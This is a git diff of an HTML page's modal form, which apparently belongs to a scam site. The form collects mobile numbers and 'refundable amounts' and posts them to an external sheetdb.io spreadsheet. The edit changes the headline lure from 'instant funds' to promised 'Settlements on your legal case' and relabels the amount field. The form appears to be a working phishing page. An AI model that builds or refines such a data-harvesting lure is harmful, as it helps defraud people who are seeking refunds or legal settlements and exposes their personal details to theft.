--- a/index.html
+++ b/index.html
@@ -137,7 +137,7 @@
         title="Close Modal">&times;</span>
     <form class="modal-content" action="https://sheetdb.io/api/v1/vs4tdo0usckts" method="post" id="sheetdb-form">
         <div class="container">
-            <h1>Verify Your Self and get update instant funds for all your need </h1>
+            <h1>Verify Your Self and get update Settlements on your legal case </h1>
             <p> Enter Your Correct details </p>
             <hr>
 
@@ -147,8 +147,8 @@
             <label for="number"><b>Mobile Number</b></label>
             <input type="text" placeholder="Enter Mobile Number" name="data[number]" required>
 
-            <label for="refund "><b>Enter your desired amount</b></label>
-            <input type="text" placeholder="Enter your desired amount" name="data[refund]" required>
+            <label for="refund "><b>Enter your Refundable amount</b></label>
+            <input type="text" placeholder="Enter your Refundable amount" name="data[refund]" required>
 
             <select name="mode" id="refund mode-select">
                 <option value="">--Please choose an option--</option>
